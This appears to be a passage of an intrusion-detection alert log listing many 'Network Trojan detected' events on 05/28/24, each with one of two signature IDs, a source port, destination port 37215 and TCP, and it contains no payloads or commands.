                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495960
                  SID:2829579
                  Source Port:35550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768675
                  SID:2829579
                  Source Port:50198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549235
                  SID:2829579
                  Source Port:49142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.913954
                  SID:2835222
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868985
                  SID:2835222
                  Source Port:49672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907234
                  SID:2829579
                  Source Port:54050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.590998
                  SID:2829579
                  Source Port:46564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664850
                  SID:2829579
                  Source Port:43438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453497
                  SID:2829579
                  Source Port:49030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323014
                  SID:2829579
                  Source Port:41630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530367
                  SID:2829579
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780999
                  SID:2835222
                  Source Port:42792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738066
                  SID:2835222
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886235
                  SID:2835222
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278695
                  SID:2835222
                  Source Port:51554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788860
                  SID:2835222
                  Source Port:50422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279348
                  SID:2835222
                  Source Port:36380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530413
                  SID:2829579
                  Source Port:34278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845933
                  SID:2829579
                  Source Port:51922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319925
                  SID:2835222
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886243
                  SID:2829579
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542764
                  SID:2829579
                  Source Port:49450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796821
                  SID:2835222
                  Source Port:42216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798532
                  SID:2829579
                  Source Port:56670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579211
                  SID:2829579
                  Source Port:37362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315804
                  SID:2829579
                  Source Port:47908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847595
                  SID:2829579
                  Source Port:45008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488840
                  SID:2835222
                  Source Port:44092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279334
                  SID:2829579
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555904
                  SID:2835222
                  Source Port:54620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576973
                  SID:2835222
                  Source Port:50802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737815
                  SID:2835222
                  Source Port:54420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588394
                  SID:2829579
                  Source Port:49056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780999
                  SID:2835222
                  Source Port:46316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660952
                  SID:2835222
                  Source Port:50174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910438
                  SID:2829579
                  Source Port:48748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316241
                  SID:2835222
                  Source Port:49674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283850
                  SID:2829579
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821073
                  SID:2829579
                  Source Port:49966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585298
                  SID:2829579
                  Source Port:45412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578898
                  SID:2829579
                  Source Port:46222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276771
                  SID:2829579
                  Source Port:51518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788084
                  SID:2829579
                  Source Port:33104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588461
                  SID:2829579
                  Source Port:36744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319163
                  SID:2829579
                  Source Port:34872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491385
                  SID:2829579
                  Source Port:59710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817788
                  SID:2835222
                  Source Port:43220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737602
                  SID:2835222
                  Source Port:43812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678738
                  SID:2829579
                  Source Port:44476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737707
                  SID:2829579
                  Source Port:57178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702574
                  SID:2829579
                  Source Port:45262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866527
                  SID:2835222
                  Source Port:34386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489236
                  SID:2829579
                  Source Port:51068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.689585
                  SID:2829579
                  Source Port:60732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.868326
                  SID:2835222
                  Source Port:53042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793479
                  SID:2835222
                  Source Port:58182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488157
                  SID:2835222
                  Source Port:60656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.511629
                  SID:2835222
                  Source Port:57456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793323
                  SID:2835222
                  Source Port:36602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651350
                  SID:2829579
                  Source Port:53060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788939
                  SID:2829579
                  Source Port:59800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912512
                  SID:2835222
                  Source Port:38234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489343
                  SID:2835222
                  Source Port:56670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628407
                  SID:2835222
                  Source Port:56788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922770
                  SID:2835222
                  Source Port:33702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886174
                  SID:2829579
                  Source Port:35572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664827
                  SID:2829579
                  Source Port:52452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802030
                  SID:2829579
                  Source Port:49570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.547378
                  SID:2829579
                  Source Port:48184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821114
                  SID:2835222
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926695
                  SID:2829579
                  Source Port:48776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627963
                  SID:2835222
                  Source Port:43390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.861322
                  SID:2829579
                  Source Port:40826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803881
                  SID:2829579
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702951
                  SID:2829579
                  Source Port:44462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788115
                  SID:2829579
                  Source Port:60352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530942
                  SID:2835222
                  Source Port:60292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908182
                  SID:2829579
                  Source Port:33046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315755
                  SID:2829579
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316370
                  SID:2829579
                  Source Port:45508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543379
                  SID:2835222
                  Source Port:60034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930146
                  SID:2835222
                  Source Port:57056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.795470
                  SID:2835222
                  Source Port:60110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536620
                  SID:2835222
                  Source Port:50314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781175
                  SID:2835222
                  Source Port:45882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806041
                  SID:2835222
                  Source Port:55462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719833
                  SID:2829579
                  Source Port:54314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318409
                  SID:2835222
                  Source Port:47828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488760
                  SID:2829579
                  Source Port:33692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651020
                  SID:2835222
                  Source Port:51252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659524
                  SID:2829579
                  Source Port:37394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545923
                  SID:2829579
                  Source Port:47092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810449
                  SID:2829579
                  Source Port:36302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.794818
                  SID:2829579
                  Source Port:35800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276474
                  SID:2835222
                  Source Port:56686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.799454
                  SID:2829579
                  Source Port:37524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594436
                  SID:2829579
                  Source Port:39732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.811562
                  SID:2835222
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888335
                  SID:2835222
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549331
                  SID:2835222
                  Source Port:45684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695634
                  SID:2829579
                  Source Port:59664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695414
                  SID:2829579
                  Source Port:51980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.583725
                  SID:2835222
                  Source Port:60428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661512
                  SID:2835222
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278076
                  SID:2829579
                  Source Port:42646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517564
                  SID:2829579
                  Source Port:56538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494508
                  SID:2835222
                  Source Port:57084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495810
                  SID:2835222
                  Source Port:53438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907517
                  SID:2835222
                  Source Port:51012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510305
                  SID:2835222
                  Source Port:38798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546744
                  SID:2835222
                  Source Port:54308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696081
                  SID:2829579
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543215
                  SID:2829579
                  Source Port:42654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650889
                  SID:2829579
                  Source Port:57962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278836
                  SID:2835222
                  Source Port:35696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790302
                  SID:2829579
                  Source Port:35188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703114
                  SID:2835222
                  Source Port:58004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546533
                  SID:2829579
                  Source Port:56064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319934
                  SID:2835222
                  Source Port:33510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.871430
                  SID:2835222
                  Source Port:43436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651466
                  SID:2829579
                  Source Port:41226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702267
                  SID:2829579
                  Source Port:52658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911178
                  SID:2829579
                  Source Port:37826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911586
                  SID:2829579
                  Source Port:57584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887304
                  SID:2829579
                  Source Port:42340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846044
                  SID:2835222
                  Source Port:41118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537018
                  SID:2835222
                  Source Port:33980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578626
                  SID:2835222
                  Source Port:58626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847544
                  SID:2835222
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294722
                  SID:2829579
                  Source Port:37642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742674
                  SID:2835222
                  Source Port:41054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766269
                  SID:2829579
                  Source Port:42552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789809
                  SID:2835222
                  Source Port:59060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488513
                  SID:2835222
                  Source Port:48972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742851
                  SID:2835222
                  Source Port:38106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537716
                  SID:2835222
                  Source Port:42386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908034
                  SID:2835222
                  Source Port:45796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664890
                  SID:2835222
                  Source Port:36766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542572
                  SID:2829579
                  Source Port:46646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.719199
                  SID:2835222
                  Source Port:44414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781027
                  SID:2835222
                  Source Port:35992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847414
                  SID:2829579
                  Source Port:44278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543178
                  SID:2835222
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887214
                  SID:2835222
                  Source Port:32952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664416
                  SID:2829579
                  Source Port:38742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786513
                  SID:2829579
                  Source Port:42820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298155
                  SID:2829579
                  Source Port:42668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493389
                  SID:2829579
                  Source Port:44170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.924496
                  SID:2829579
                  Source Port:53608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528104
                  SID:2829579
                  Source Port:47720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585195
                  SID:2829579
                  Source Port:39956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.512062
                  SID:2829579
                  Source Port:41232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278415
                  SID:2835222
                  Source Port:42126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294539
                  SID:2835222
                  Source Port:49648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587015
                  SID:2829579
                  Source Port:45430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790537
                  SID:2829579
                  Source Port:42172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543213
                  SID:2835222
                  Source Port:55974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629152
                  SID:2835222
                  Source Port:48614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627977
                  SID:2829579
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483039
                  SID:2835222
                  Source Port:36708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530888
                  SID:2829579
                  Source Port:39674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651365
                  SID:2835222
                  Source Port:41554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.793452
                  SID:2835222
                  Source Port:35086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491994
                  SID:2829579
                  Source Port:54370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695690
                  SID:2835222
                  Source Port:35378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495014
                  SID:2829579
                  Source Port:58788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791736
                  SID:2835222
                  Source Port:40316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661020
                  SID:2835222
                  Source Port:33900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527357
                  SID:2829579
                  Source Port:54786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529115
                  SID:2829579
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490340
                  SID:2835222
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886658
                  SID:2829579
                  Source Port:53030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628294
                  SID:2835222
                  Source Port:44316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702706
                  SID:2835222
                  Source Port:54672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629072
                  SID:2829579
                  Source Port:42586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926991
                  SID:2829579
                  Source Port:58984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651402
                  SID:2835222
                  Source Port:55478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661534
                  SID:2835222
                  Source Port:47024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661565
                  SID:2835222
                  Source Port:39146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661996
                  SID:2835222
                  Source Port:42256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695138
                  SID:2835222
                  Source Port:35402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847566
                  SID:2829579
                  Source Port:34016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719364
                  SID:2835222
                  Source Port:54856
                  Destination Port:37215
